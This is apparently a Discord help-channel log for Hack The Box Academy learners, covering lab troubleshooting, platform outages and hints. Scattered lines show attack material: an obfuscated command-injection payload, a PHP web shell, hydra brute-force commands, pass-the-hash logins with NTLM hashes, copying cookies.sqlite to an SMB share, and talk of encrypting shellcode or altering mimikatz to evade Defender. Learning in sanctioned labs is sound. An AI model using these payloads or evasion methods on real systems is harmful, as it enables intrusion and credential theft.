#modules
--max-retries affects port probes too, sometimes a port can be open but closed later during a scan
But if I check how many probes nmap sent to the target through --packet-trace, it only SENT 2 times and concluded the response if the host discovery is disabled or only SENT 8 times and concluded the response if the HOST discovery is enabled. That's the part I am confused about, I mean why did it not send 10 probes as mentioned in the --max-retries when it does not receive any response?
What is the other question you are having a difficult time with as well?
Is HTB academy down?
500 | Server is not feeling well
it only affects port scans, not host discovery
same
okay but i tried with port scan too by disabling host discovery. like it did not try sending 10 probes before concluding the result when it does not receive any response from the target but just by sending 8 probes then it just concluded the response as filtered even though it mentioned to send 10 probes in --max-retries by default.
okay but that doesn't affect things? if you feel that the number is insufficient, increase it. you'd rarely have to mess with this value
same
okay understood👍, I am just trying this to understand why it did not work in --max-retries. Thank you.
I have the same problem... does it happen to everyone?
yah, there is clearly something wrong with the service, I can't open the htb-academy module page normally.
anyone can help?
can you link the section, ill see if i have access to it.
anyone getting 500 errors at login? just starting up for the day
repeated 500s after login, browser reset, cookies reset etc.
password cracking module password hunting in windows section
is the academy server down, was working on it earlier today but getting the following error: 500 | Server is not feeling well
The nibble academy machine has been unstable as well
after login just get that 500 error
Yes, I confirm the behaviour; After logout cannot login anymore; The error message is 500 Server is not feeling well
think i will wait an hour or two then try again
damn, was about to answer the last question of a module :/
yes, the same for me
500
Server is not feeling well
guys i have issues with this one any help?
password cracking module password hunting in windows section
i was about to ask if the login areas are bugged but i think yall already answer my question.
default password are often stored in configuration files.
yeah but i receive so many output its just time wasting by looking one by one i'm missing something
you can DM me if you get stuck.
if i want to add the subdomain to my etc/hosts/. should i write like this?
Its at the top after kali. I think the bottom is reserved for ipv6
Hi, do ya know if certs only can land you a job in Europe ? I'm still trying to know 🤔
depends on a lot of things, but definitely can help
so if you can, do it
Maybe see if there are other services running that will accept those creds.
Hi everybody
I got stuck in the Exploiting SSTI - Twig Example from Server-Side Attacks. I have the RCE and when i do 'ls' i don't see any flags,
am i looking for it in the wrong place ?
I'm facing this issue again and again
While solving:
Host Based Enumeration
Topic: Oracle TNS
did you install it correctly?
No
Any hint would be appreciated 🙂
link me, i think i have a nudge for you.
i need help with nmap IPS evasion Hard, i tried ```sudo nmap 10.129.77.45 -p 50000 -sSU --source-port 53 -sV --disable-arp-ping -Pn```
also -sA, -sT, T1 send delay 50s , decoys -D RND:5 but nothing. keep getting ibm-db2 or tcpwrapped, nc yields nothing
and filtered. am i looking at the correct service?
i need help with the medium nmap ips lab, cant manage to find the dns version. already try every solution i find on the htb forum
just refresh the page and try again. Maybe switch regions. It happens once in a while. labs have been working for me.
You're in the right direction, the solution is covered in the material. Throw all the weird tricks you learned at that port
oh wait, did you just edit that?
deleted some stuff yeah i think i was tripping
Ok, yeah, you're //really// in the right direction but maybe throw things at the problem one at a time though.
Definitely note the differences when you're specifying a source-port vs not specifying that source port. Think of any other utilities that might garner you information from the service.
okay, thank you
yepp
Determine what user the ProFTPd server is running under. Submit the user name as the answer.
I'm a bit stuck on assessment II for nosql.. anyone available for a small nudge?
Use cURL from your Pwnbox (not the target machine) to obtain the source code of the “https://inlanefreight.com” website and filter all unique paths of that domain. Submit the number of these paths as the answer.
i think i find the solution but htb is not accepting it 😭 can someone confirm this is the answer i'm looking for ? thanks !
sure DM me
If it's not accepting make sure you have no white space before and after. It could also be the wrong flag
It was the wrong flag ahah, but thanks for the tip 👍
Is HTB Academy having issues atm? I can't terminate my machine for whatever reason. The button for it is gone.
Currently on SQL Injection Fundamentals
Did you refresh the page?
Yeah I did
This has been happening for me off and on for the past 2 days actually.
I usually have to wait for the timer to run out but even when I start up a new target I can't always connect to it.
Anyone know how to deal with the "there are no active instances left" im in the middle of a module end assessment and had to reset, now im caught in this... tried clearing browser data and logging out and back in, changing pwnbox location...
anything else?
I got the same issue
ok good to know
same here
there were 5XX errors this morning, that seems to have been solved but we still seem to be having issues and we're not seeing anything in the announcements yet -_-
@burnt steeple @old oasis any luck yet? none here
i guess im gonna call it quits for a while... -_-
kk thx, imma fuck off for a bit then
"There are no available instances. Please try again later."
so the issue with the instances not available is not happening only for me right?
There is an issue with pwn box
Me too
Guys, can you connect to VM?
Yes, you can use VPN to access the Module Labs with your VM
Got it
I experience that myself. HTB is working on it?
Hi guys, I'm doing the Skill Assessment of the Pivoting module.
I'm having a hard time in enumerating the network once I'm logged on the INLANEFREIGHT machine. Can someone tell me whether I'm on the right path in trying to scan the whole 255.255.0.0 subnet? Because I've tried 255.255.255.0 and it didn't lead to anything
I’m having the same issue right now
Yes, you're on the right track.
but what do you mean by scan? If it's taking ages you might find a better way to identify other systems in that network.
why are you trying to scan the subnet mask?
i'm pretty sure that's not a network in the lab
I believe he's referring to the subnet.
like, /16 or /24 but as a netmask
I need to know about the possibility of transferring any remaining credits from my HTB platform account to the Academy platform. I am interested in using these credits to purchase boxes for modules within the Academy
If this is a Windows lab be aware that most do not respond to ping you'll need to scan via tcp like -sV or similar.
Yea, might be my miscomprehension here 🙂 i'm currently convinced that subnet and netmask are the same thing, but I suppose I'm being wrong ?
oh, thus I'll have to tunnel onto it
No, you're right.
255.255.255.0 = /24
255.255.0.0 = /16
However, as calculatedOre suggests, I hope you're not scanning 255.255.255.0!
You've got it right, it's just that most windows machines don't respond to icmp scans .. (pings) so you'll need to utilize other scanning methods...
I was 🥲 at least, that feels to me what the assessment demands
When you do a bunch of Linux boxes and find yourself on a Windows target you may get used to them responding then chase your tail for a bit... Ask me how I know ;P
why i cannot open the link?
practice 😄
You've connected to academy VPN on your VM right? That's a different connection than boxes.
yeah there is a difference between academy VPN and labs VPN
If you're certain you're connecting to academy try to redownload a fresh connection file and failing that... Are you doing a Windows machine? It won't respond to ping and may not have a web server running on port 80. Scan it
I did the same mistake earlier
Hi, I am doing the last tasks in Getting Started Module. I am logged as an Admin in the web but I can't upload any files.
i do in my vm
Have you pinged the target? Looks like a WordPress site, go thru the instructions make sure it being served on an uncommon port and verify you're getting that response from ping
Oh snap, check for http title and add to hosts of course ... You can get that from 'nmap -vv...'
Sometimes instructions tell you what hostname to use in hosts file as well
Likely a vhost being used which will require an addition to your host file
So how are you doing on this, have you found the next host? If not you can DM me. I've got a few minutes to check out what you're trying and give you a hot/cold clue.
try using msfconsole instead
i already did a nmap but it gave me nothing
I would advise you to learn nmap more than rely on autorecon every time. At least to start. What I do is issue a series of progressively time-intensive scans and you should probably work out your own procedures:
- Two scans: default TCP scan and a default UDP scan... this gets everything like 95% of the time
- Standard scan but with -sV or maybe some other scripty stuff, banner grab, whatev
- Then do the weird scans like ACK scans or whatever
- Finally start full TCP / UDP scans and let them run in the background but move on to inspecting all the stuff you'll have almost instantly found with the first scans.
somebody online who has done the digital forensic module?
That's kind of what I was suggesting. I mean, chaining them together -- especially the slower stuff. And, yeah, I have to explore autorecon myself but if youre on the nmap modules might as well get used to using nmap because that nitty-gritty knowledge comes in handy more than just throwing a comprehensive tool at the problem.
Hi all,
I am trying to answer 'Try to exploit the upload form to read the flag found at the root directory "/".' on the File Upload Attack skills assessment.
I've managed to find upload folder directory and confirmed I can see a test image file from it. I am a bit stuck on uploading a file. I have intercepted the upload page and have used intruder to find some extensions I could use to bypass and upload. I am now just stuck on trying to submit it.
Is anyone able to help nudge me?
Apologies if it's really simple, have been at this for a little while.
Any thoughts? On the mssql section of footprinting. Have tried it on kali as well as the pwnbox
try it without python3 before mssqlclient.py (I only looked at last command)
Heard. Thank you
have you found the URL where the uploaded files are stored in the server?
Yes I have found that. I've uploaded a normal jpeg image and confirmed I can open that by going to the upload directory
in the module you have learned methods to upload 'special files' which allow you to gain foothold in the system. maybe try upload one of those.
Thank you I will have a read through again! Been looking at for a little while so sure I have just missed something simple.
I always wonder when I see pictures like this. You want to learn how to hack, but you don't know how to take screenshots.
Have discord on my phone. Didn't add it to my computer
any simple way to transfer files from host to pwnbox? Working on evasion module - dynamic analysis. Switching between the DEV and TARGET machines is time consuming and a pain, so I figured making them locally would be easier
smbclient and copy them over
impacket-smbserver -smb2support share /tmp/smb/shared
copy .\cookies.sqlite \\192.168.45.179\share\cookies.sqlite
- 0 Try adding any of the injection operators after the ip in IP field. What did the error message say (in English)?
But
please match the requested format. is saying invalid
Hello everyone ! For the Injection Attacks module,(Web pentest) Skill assessment. I got all the xml in the invoice but i`m stuck in getting the data from the arrays.
just say ur problem, what is it
i am crazy or?
anyone know how to fix an issue where mssqlclient.py logins and runs normally until you try to use and the commands give no response back? I tried googling it but no one else seems to be having this issue
You can DM me
i think i faced smth similar in the past, i was using an older version, when i updated it worked
Code error 600?
make sure ur using the latest version, it MIGHT work
Hello,
Anyone got a hint to get the last flag of the SA of the introduction to sliver module?
Got DC02 pwned but can't really figure how to move on from here
ill test it out again, i copied and pasted from the github
where?
What did u even ask?
yea, i just pipx installed instead of using the git repo script and now it works. thanks for the help
please refrain from spoiling module content.
mannnnnnn lol
Why not switch to root first?
in cases such as the exercises of file upload attacks where there is no need to connect to vm, what options are there if the connection is way way too slow?
None i guess right?
nvm, Getting Started is Tier 0. should be ok
still no... i must be doing something wrong with vim id_rsa file.. stumped...lol
you still didnt switch to root
you can't edit that file due to permissions
you have root's private key
look for something else you can use
I'm currently on the "attacking FTP" module in week 6 "attacking common services" and I cannot find the FTP port. Is there a command I need to use that I'm not using? Every time I run an nmap scan the scan shows no open ftp ports. Is there something I'm missing?
Has anyone else had trouble in Windows Evasion - Dynamic Analysis - using the shellcode from the tool provided? I can't get a callback in the shell after AES encrypting it for some reason, no error, the cmd prompt runs after launching the NotMalware.exe and there is no callback on the listener. The following (Option #3) C# program works fine, and the shellcode in the previous module worked fine. I also tried without it being AES-encrypted and it also did not work for me like that. Any thoughts on what is going wrong?
have to keep restarting that machine
So the VM is fucked? great lol
You may need to try another one of the options shown in the module 😉
oh wait you said you did try them, so you got the flag then?
i don't think anything is 'wrong' there's only 1 method that works in that section
Yes
Try passing the IP and port directly in the code to that custom C# code in the Dynamic analysis section
You should get a shell
The automation script won’t know what’s your network specs to call back
anyone else having trouble finding the FTP port in Week 6 "attacking FTP"?
Right I tried them all, only the c# one works as a test from the dev machine; I did not get the flag since I can’t trigger that one myself due to the .exe restrictions on the target machine in C:\ drive
Dm and I can give you a direction
tried every way...lol user2...as well as root as well as .ssh... lmao... it'll come lol
google how to ssh with a private key
It said permission denied. You need to elevate your privileges because the user context that you're running the command under doesn't have the permissions required to write to the root directory.
the module also goes over the process of using root's private key
you skipped the first part
Anyone here who can give me a slight nudge for NoSQL skill assessment 2 ?
Are you connected to the VPN at the same time as having the pwnbox spawned?
No, it seems the machine is not responding
did you try reload it?
sometimes it happens
I refreshed the page, and Terminated the spawn
and the Spawn a new machine, with a new IP
But it keeps somehow not responding to some requests
via vpn or pwnbox?
Currently, only using my local machine + VPN
try both, Idk why, but it really happens sometimes and you should try pwnbox
Just a curiosity, but what exactly is a Service Principal Name (SPN)? It's not an Active Directory object I don't think. It is an attribute of a user, or an attribute of a service running on a computer?
here's what to do: terminate the target. terminate the pwnbox if it's on. disconnect from the VPN. re-download a fresh new vpn file. connect to the vpn. hard refresh the page where you spawn the target with CTRL+SHIFT+R, wait 5 mins after it spawns and try again. that should clear up any issues.
Googling just gets me some variation on it's being a "unique ID that ties a service to the user account running that service"
Ok. I found something that sort of explains it. Best I can tell they're like "aliases" to an user object that reference a binary (the service part) and apply to a computer object... so they're not exactly objects or attributes. Microsoft is so weird.
SPN's are unique identifiers for a service instance in a network that uses kerberos authentication. it's a string that identifies a service instance. they help identify which server or service the client is trying to connect to and ensure proper authentication.
Thanks, right, the thing tripping me up is that AD is comprised of objects with attributes, but an SPN is neither an object nor an attribute while being related to both in some way. Thinking of them as aliases helps tie it together in my mind.
Sure. String identifier is just like... a type of data as I see it. Like a GUID or an integer ID. So I can understand that in the context of a field in a kerberos token, but everything else in AD is an object. Like, are there other string identifiers that aren't SPN's? Probably, but they're probably properties of an object where SPN's are not objects.
Anyway, it's neither here nor there. I'm just trying to I guess refine my understanding and terminology.
spn's are stored as attributes of certain objects, aka the servicePrincipalName attribute
so yes they are attributes
i guess more technically it's a value of an attribute
Hey guys i'm stuck at password cracking module hunting on linux section
with the hint they said that they found a user kira with a certain password but when i use tools to enum users on the machine i can't find a kira i just find a sam
ahhhhh not installing key.pub on target... smh
Just took a look and i suppose the thing was to brute force creds with hydra using the usernames on htb resources and the rockyou txt file? If anyone can help me with telling how you normally find the kira user ^^
i found different users like ||will:123456, john123456, dennis:123456|| and a bunch of others with the same pwd but i can do nothing with it
and if you do it with the rockyou list it takes dayssss
Hey everyone,
I’m encountering issues with Login Forms on Login Brute Forcing module and I think I’ve set everything up correctly. Here’s the Hydra command I used:
||hydra -L top-usernames-shortlist.txt -P 2023-200_most_used_passwords.txt -f 83.136.254.47 -s 41425 http-post-form "/login.php:username=^USER^&password=^PASS^:F=<form name='login'" -t 60||
This is the output I got:
[DATA] max 60 tasks per 1 server, overall 60 tasks, 3400 login tries (l:17/p:200), ~57 tries per task
[DATA] attacking http-post-form://83.136.254.47:41425/login.php:username=^USER^&password=^PASS^:F=<form name='login'
1 of 1 target completed, 0 valid password found
Despite running the attack, no valid passwords were found. Can anyone provide some guidance or hints on what might be wrong? Any help is appreciated!
It finally is working; Terminated, spawn again, but now selected VPN from a different region with TCP
can i get a sanity check plz on "Advanced Command Obfuscation" exercise - https://academy.hackthebox.com/module/109/section/1039?
the payload is || ip=127.0.0.1%0a%09{ta"i"l,-n,1}<<<$(g"re"p%09mysql)<<<$(g"re"p%09r"oo"t)<<<%09$(f"in"d%09${PATH:0:1}u"s"r${PATH:0:1}s"ha"re${PATH:0:1})|| and the output is ||/usr/share/glib-2.0/schemas|| but it's not liking that answer
is there something wrong with this command:
evil-winrm -i 10.129.78.245 -u INLANEFREIGHT\lab_adm -H A96ED648BE6FFFB03F3E086F25282F2D
you're passing a \ which resolves to literal char 'l'. use \\ if you want to escape a \
do you have one or two \ in the username
bc discord is escaping them too, so to get \\ i have to use 4
username is lab_adm from the AD enum and attack module
right but you have the domain. do you have one or two \ between them
if 1, try 2. if 2, try dropping the domain
Take domain name out
it just doesnt work no matter what ... Did anyone try to pass the hash on this module using evil winrm ?
Is the user able to winrm?
might be the wrong user, i seem to recall thinking lab_adm user was for internal use not for student use
but link the module, maybe it'll jog my memory
- I have checked through CME exploiting SMB to test hash if it auths and it did to many hosts
- then I checked which of those hosts there is winrm port open
- still not work ...
Yeah that was usually the case,I don’t remember using lab_adm ever
Probably forgot tho
Is this the correct order of operations for me to do ?
Also it is kind of tedious to have to cross check IPs to find this stuff .. any better method ?
bro link the module so i have a clue what you're asking about... or i guess wait for someone else to help
Sorry guys I made a mistake, the hosts that have win-rm dont match the hosts that have smb which the hash worked on...
Maybe I just didnt find the right user yet
But I did find hosts that are vuln to eternal blue so Im gonna try that ...
that link just went to the initial enumeration page i don't think that's the right link
Sorry I am not following the module, I am just trying to try things to learn
Def not the answer
aight yeah good luck, hard to help if i dunno what exercise you're working on / trying to replicate
bump^^ 😉
The answer starts with /usr/share/mysql/ not /usr/share/glib-2.0/
hrm i suppose it should include mysql since it's being grep'd huh
thx figured i was missing something dumb... now to figure out why it ignores the greps
that command is so long 😭
i feel sooo close but cant save key to remote target???
reread the SSH Keys part in the privilege escalation section of the module again
they explain everything you need to do
bout to... i am obviously overlooking something.... gonna go back further
You know how when you install something on Windows you get a confirmation dialog box that asks yes/no to run the program (User Account Control)? Same idea with Linux, you need to elevate your privileges to write to the root folder. You can't do it with a regular user account that doesn't have permissions there.
yeah seems <<< can only be used once and you have to pass it a string hence the subshell ... good to know at least
yeah, thats why i usually just go with the base64 method
I get to root but still permission denied
how many min required to crack the hash on Password Attacks Passwd, Shadow & Opasswd? (ive tried 15m with rockyou.txt but i did get the password)
the password attacks module can take a bit longer, but nothing should be more than like 30 mins or so
most of the modules that have cracking in them take a few minutes except that password attack one. not sure about cracking with hashcat as i didn't do that module.
oohhhh i haven't actually been root... hmmm
i told you 😛
WOW!!! I was trying to do WAYYYYYY too much!!! smh...LMAO!!! Gott itt
Never had to write anything...just follow directions...right after chmod...lol... hours and hours... still fun tho lol
Can anyone nudge me on the Server-Side Attacks - Skills Assessment? Some people have talked about being given login creds off the bat, but I am not seeing any of those. I am also not seeing the ||static/jquery.js|| that others have talked about. Has this lab been changed?
it was recently updated yeah
what is the god damn answer: What is one prominent issue with passwords?
Broken Authentication
Brute-Forcing Passwords
Nobody is going to give you the answer. It’s also a tier2 module. The answer should be in the content.
Yes, thanks, it only took me one control + f check and looking for the question within the module text. I'm just rambling. Sorry, it's very late and I'm tired.
Take some time to do something relaxing and go to bed 🙂 the brain needs some time to wind down
hi guys how should i organize notes or make notes on what etc note tips?
I’m personally a fan of Obsidian
But there’s many out there
Try some out and stick with the one that feels most comfortable to you
i c thx do u have any advice on how to organize it tho
like just make a new file for each module for each page and just note down most important bits
?
how do we enable copy and paste into our pwnbox?
specifically from my system to the HTB vm
thats what I did for the most part, but everyone takes notes differently, just start noting stuff down and you'll figure your style out
I create a folder for each module and page for sections. Separate page for cheatsheet
That should work via the browser normally. Or at least, does for me
I use chrome on Mac
where do I find that setting?
I didn’t need to change any setting. Only thing I experience is that if I have pwnbox in a separate window, I need to copy after refreshing for a proper resize
Does Firefox just not paste then?
I can’t answer that, haven’t used Firefox for HTB yet
There's an icon in the lower right you need to click on, that opens a window you can paste into from your machine, it's the clipboard for the pwnbox too so if you copy something in the pwnbox it's there in the clipboard.
If you don't see it turn off adblocker
I guess I will never see it then
why? is your adblocker bad and can't disable it for a single domain?
not like there are ads on htb
JK obviously, I appreciate the info
Module: File Upload Attack
Section: Blacklist Filters:
Are we supposed to escape the sanitization in the upload?
intruder (URL encoding OFF) and discovered the whitelisted extensions.
And uploaded the payload via proxy and modifying content to <?php system($_GET["cmd"]); ?>
But even with it shown as uploaded successful, when I browse to that page under /profile_images/ with the required parameters, it will not show the content at all
More than that, when i inspected page source, I found out that my payload content was commented out
Oh never mind
I see why now
Need to do more enum next time
I don't really get the digital forensics module. Now, the skill assessment is with Velociraptor, but the module only gave a brief introduction to the tool.
strangest module ever done at htb
but i want end it and rate it, muhaha
⭐
i mean how bad is a module, when you reach the skill assessment and dont even know where to start.
Skills Assessment - Easy
Abusing HTTP Misconfigurations
Can someone help me with this?
Good Day I need help in Vulnerability Assessment Nessus Skills Assessment
Problem: HTB gave information of the target 172.16.16.100, and credentials for authentication. However, upon doing ping on 172.16.16.100 there was no response. So I did a basic network scan on the spawned pwnbox. The pwnbox has a different credential from the given target 172.16.16.100 so I add both credentials for windows authentication. The scan went well and it has infos, and detected vulnerabilities. However, upon searching for SMB there were no results, so I assume that the authentication was a failure. If someone can enlighten me what I did wrong, it would be a huge help. TY!
It seems like a session puzzling auth bypass issue but can't exploit it!
There is also a reflected XSS on the products page but there isn't any caching mechanism in place to exploit that.
you need to access nessus on the spawned target, not pwnbox, read the requirements part
Apologies, I may have created confusion, to sum things up.
From the Requirements section:
Target: 172.16.16.100
creds: administrator:Academy_VA_adm1!
From the Spawn Target:
Target: <Some IP when spawned>
creds: htb-student:HTB_@cademy_student!
Because it says here... "Authenticate to <spawned target IP> (ACADEMY-VA-SCAN01) with user "htb-student" and password "HTB_@cademy_student!""
Used kali linux WSL2
I did put the IP from requirements, and spawn target. But nessus only scanned the spawn target. Additionally, there was no port 445,139 detected in the service, I also double checked this using nmap.
Nessus can be accessed at https:// < IP >:8834. The Nessus credentials are: htb-student:HTB_@cademy_student!. You may also use these credentials to SSH into the target VM to configure Nessus.
Once logged in, perform a BASIC NETWORK SCAN (modify the scan template to scan ALL ports, leave all other options the same) against the target: 172.16.16.100. Additionally, set up the scan to be authenticated using administrator:Academy_VA_adm1! as the credentials.
don't use pwnbox to scan
can anybody say me how to start the skill assessment in digital forensic. totally lost
i mean am on right track here? or i am total wrong? i have no idea?
these are the artifacts\collections right? now the first question is about VAD.
i have collected the windows.system.vad for the first question, do i have to do this for every artifact?
how should i analyze them? download as csv and than?
i just want to end the damn module and rate with 1 star
hi
any mod online who can help?
what's up?
this
And why do you need a mod for this?
why not?
mods can't necessarily help with that
use what you've learned to complete the assessment
thats the point. don't really get the digital forensics module. Now, the skill assessment is with Velociraptor, but the module only gave a brief introduction to the tool.
for this module it does drop you right in, but it's easy to figure out once you realize what you need to do
just have a closer look at the Velociraptor section and it should be clear
that what i tried here. right track?
or do i have to buy the annual subscription for a step by step guide
i don't have my notes atm so i can't tell you
Yes, ||Windows.System.VAD || is correct
ok, thanks. but i am a bit confused, there are a lot of flow ids, those are collections? now do i have to "hunt" the vad for every flow id?
How did you solve it in the module a few sections earlier? The method is exactly the same, only the data is different
hey guys, has anyone had troubles with the second question in module "Analyzing Evil With Sysmon & Event Logs"? (https://academy.hackthebox.com/module/216/section/2301)
I injected the PS.dll and it is shown in Process Hacker, updated and utilised sysmon custom config.xml, but I can't find clrjit.dll and spoolsv.exe together.
Hey guys can someone help me with this? its password cracking module linux hunting section?
I found a zip on the target with a password on it i tried to bruteforce it and found a pwd but it doesnt work
just want to know if im on the right path
This module is all about cracking passwords. So yes, you're on the right track.
Thank you for this, and for your patience. I now understood the instruction, and the main problem was accessing the https://<spawn_target_ip>:8834 saying that site can't be reached, both Firefox, and Chrome. I did however successfully connect to HTB VPN, even replaced it, pinged, and nmap <spawn target ip> -p8834 which results to an open port. I accessed the machine's nessus through pwnbox and it worked. But I am still left clueless why the machine isn't accessible through my browser
how to avoid false positives on cracking zipfiles then? you have an idea?
And here we are again at the point where I need a crystal ball. Without knowing exactly what you've done, it's impossible to see how you can prevent false positives.
Follow the module. It shows you exactly how you can crack what and what you need to pay attention to.
you weren't really supposed to crack any zipfiles. Just utilize the methods that were taught in that section
you'll need to connect to vpn to access the target outside of pwnbox, because the ip isn't publicly accessible
All you need to know about the VPN Connection for Academy
VPN was successful, there is a tun0 appearing, and the same tun0 IP from the pwnbox.
don't use vpn and pwnbox at the same time
can someone help me with the linux basics module, to get the answer to this question? Which kernel version is installed on the system? (Format: 1.22.3)
Do you remember the command which they taught you to get the OS and Kernel details about a host?
no
read the section again
okay
it's there
thank you
I see now that the problem lies within my WSL2 environment. While I can access the targets from previous lessons, accessing https://<spawn_target>:8834 is another issue. I downloaded an openvpn software for windows and used the openvpn file from HTB and is accessible. Thank you for sharing your solution, sir
I am stuck at Footprinting / smtp / + 1 Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer.
I know I can do brute forcing to get the username but is there a manual way that i can use?
did you do a google search for smtp user enumeration or anything at all?
ah I missed the wsl part, so you've connected to the vpn in wsl, but cannot connect to the target in your windows browser, correct?
yes, while wsl2 kali was successfully connected. Accessing the link from the browser was unsuccessful
my bad since you already know about the brute-force part it won't help you.
wsl is pretty much a separate system, so anything you do inside will stay in there
I'd recommend using a standalone virtual machine since there's no gui in wsl
Due to potato spec, I had to devise a simple and light-efficient way to use kali. I did use parrot OS and is lighter than kali, but I might need to wait to buy for upgrades.
ah I see, if that's the case then probably using pwnbox would be better
Does anyone know where to find a section about modifying lazagne/mimikatz so it can be used when defender is running? I can't find it anymore.
that is always evolving, things that work a couple months ago will get detected
I have a project that does it but you'll need to modify it a bit
the windows evasion module goes over obfuscating the rubeus source code to avoid detection, probably could apply to lazagne and mimikatz too. but i haven't seen a module about lazagne/mimikatz specifically. (i haven't done all the modules either)
laz and mimi are exe so it's not as simple as just encrypting and injecting into a remote process but the idea of evasion is similar
Yes that's where I've seen if I recall right, it similar to changing shellcode but maybe I'm mixing it up.
it teaches using threatcheck to find where defender detects it then modifying the source code
its in the open source software section
nt authority\system
thanks
Hi
yes i did, all I found was about brute forcing
so is there a way to do it without brute forcing?
How do I speak in general?
Thanks super nuts
someone to DM about many AD stuff?
it's better to just post the question imo
has the pwnbox issue been sorted? i see we're still getting a warning at login.
its been a bit laggy though working fine.
im having tough time with password attacks-
thx, mine just spawned didn't want to jinx it
too much questions and not clearly sorted in my brain
they hydra module?
make a list, post the list.
good questions beget good answers
the attacking active directory section
hey guys im trying to crack a shadow file i did those commands
guys you guys know how much of academy should i do to make sense in buying labs
ah windows, my favorite.
you done this password attacks module? i might need help with this one.
not that particular one -_-
lol. everybody hates this one.
I have a question about Attacking Enterprise Network - in the section 'Exploitation & Privilege Escalation' walkthrough, some credentials were mentioned. my question is, is it possible to obtain said credentials even without the walkthrough? I tried to use some metasploit module but It didn't work.
*I've tried to be as vague as possible in the details to avoid spoilers, however I can DM the questions with more details to get better answer.
currently doing it and can confirm it gets frustrating
Hello I've just started learning, and am looking for a mentor
not the right place to look for a mentor
Damn any advice then
idk im doing everything right but still it's getting stuck here:
```
┌──(hx0r㉿kali)-[~/Downloads]
└─$ impacket-psexec Administrator@10.129.204.23 -hashes :30B3783CE2ABF1AF70F77D0660CF3453
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Requesting shares on 10.129.204.23.....
[*] Found writable share ADMIN$
[*] Uploading file ejzYzEBK.exe
```
check out the guys doing live recon on youtube, some of them mentor... for $$ tho
prob really worth it tho... for the right one
can you share your full terminal output? it looks clipped?
hey guys I am probably a beginner in security, I did networking, windows and linux fundamentals from htb academy. Should I start preparing for the CPTS exam?
Thats it ..After that its not going anywhere
ok so its in the middle of the upload? how big is the exe its uploading?
Same thing with crackmapexec ..Im not able to execute any commands after -x flag
re-run the cmd and tap the space bar button after a few minutes, to try and kick the terminal over?
Thanks
oh gosh, it must be back.... 5xx errors for a bit yesterday followed by pwnbox failures once you finally logged in...
log out, clear browser cache, etc.
ok thanks !
in the SOC Path -> Windows Attack/Def
https://academy.hackthebox.com/module/176/section/1791
we run a cmd like this...
.\Rubeus.exe asktgt /user:DC2$
i've never seen users/hosts referred to with this $ char... like we do with a hidden share \\dc2\c$ ... is this noteworthy for some reason?
chat gpt says that it's a "hidden machine account", is this a good answer?
all computer accounts' sAMAccountName ends with a $, $ after a share name means it's hidden
ie: its a known host would /user:DC2 also work?
it's just to differentiate between user and machine accounts
Read and follow #welcome
Pivoting, Tunneling, and Port Forwarding
SSH for Windows: plink.exe
I don't understand what to do in the module, I connected with rdp but there is no program called Proxifier
Attempt to use Plink from a Windows-based attack host. Set up a proxy connection and RDP to the Windows target (172.16.5.19) with "victor:pass@123" on the internal network. When finished, submit "I tried Plink" as the answer.
Hello can anyone help me for Attacking Common Applications:osTicket
i try to use credentials which in the instruction but it give error, do i need to register with dehashed which in lab and then search usernames or what?
zap hud isnt working 👀
anyone has an idea?
Wrong Channel 😉
Please read and follow #welcome
Ok
i had probs with zap too, this was a month ago or so... nobody uses zap in real world you might trudge thru the zap modules if you feel ABSOLUTELY inclined, but it prob better to use burp unless you're just over invested in the module.
Answer my question
yes, you mean dump lsa?
not exactly. I dont wanna give here too much details, can I DM you with the question with more details?
I only see 2 creds being used in that section, you're talking about the config file?
it's found previously during the info gathering phase
deleted the message because spoilers
thanks 🙂
I am having some issues with Sharphound, that the older versions are just not working and the latest version is having issues with Bloodhound(Stuck on 0%), Is there any reliable way to to fix this, which version of sharphound i should use?
2.0.0
ok thanks
also the bloodhound gui you're using is probably outdated, the later versions are using docker
is there any installation guide i can follow?
this version will work with the latest sharphound
i should just change my bloodhound version rather than doing the collection again, feels like the best approach
by latest u mean 2.5.7 right?
whatever version is available in the repo
hey guys, I'm really stuck at the last question of the c2 sliver SA.
I crafted both diamonds and golden tickets but nothing seem to work.
any hints?
After uploading a svg, the response shouldnt return the file we want given that the file was uploaded successfully? Or do we need to find where it uploaded to access it?
Nvm it was in the second response the answer not the first
Is there anyone who can help me with this assembly code module?
This is the question, "Edit the attached assembly code to loop the "loop" label 5 times. What is the hex value of "rax" by the end? " And here is what I currently have the code set to.
```nasm
global _start

section .text
_start:
    mov rax, 2
    mov rcx, 5
loop:
    imul rax, rax ; multiply rax by itself
    loop loop ; decrease rcx and repeat the loop
    ; After the loop ends, the value of rax will be 2^5, that is 32.
    ; The hex value of rax is 20.
```
This corrected code will loop the "loop" tag 5 times and at the end the value of rax will be 2^5 which is 32. The hex value of rax is 0x20. but it says the answer is wrong .
yeah if memory is serving me correctly locating files uploaded is covered later on in the module
it's not 2^5
better to just run the program and step through it
Can anyone help with the Login Brute Force Module on Basic HTTP authentication I keep getting Errors Child with PID terminating.
posting the actual command and error would be helpful
```
hydra -l basic-auth-user -P 2023-200_most_used_passwords.txt 94.237.50.176 http-get / -s 81
[DATA] max 16 tasks per 1 server, overall 16 tasks, 200 login tries (l:1/p:200), ~13 tries per task
[DATA] attacking http-get://94.237.50.176:81/
[ERROR] Child with pid 21892 terminating, can not connect
[ERROR] Child with pid 21895 terminating, can not connect
[ERROR] Child with pid 21896 terminating, can not connect
[ERROR] Child with pid 21894 terminating, can not connect
[ERROR] all children were disabled due too many connection errors
0 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-10-06 08:58:17
```
can not connect
make sure you're using the right ip and port
https://academy.hackthebox.com/module/17/section/64
for this section i already found the version but why i got Wrong Answer?
for the question number 1
I found the issue thanks.
I haven't started the module but if you are looking for a wordpress version using wappalyser to check your answer may help, if they arent the same odds are it may be wrong
that's not the website you're supposed to visit
where do you even get that
this is the main website,but the main website is not using wordpress
can anyone help me for Attacking Common Applications:osTicket
i try to use credentials which in the instruction but it give error, do i need to register with dehashed which in lab and then search usernames or what?
can anyone answer?
I've already done it, but I still can't find it.
Look at each link
Burp is way way slower than firefox, any fixes in mind? Firefox running htb exercise on browser loads immediately but burp takes like a minute or so. Any ideas?
I just mucked about a bit, and I found it, the link should stand out to you its what you do after to get the info... nudge nudge
the burp browser?
After many tries i can not find right answer anyway 😦
just let it loop 5 times and look inside $rax
alright thank u
i already checked all links from the website
what is wordpress most commonly used for?
not trying to be harsh or cryptic but you will learn a lot once it clicks, Its an uncomfortable feeling but you are close
except for the blog site, i cannot open it
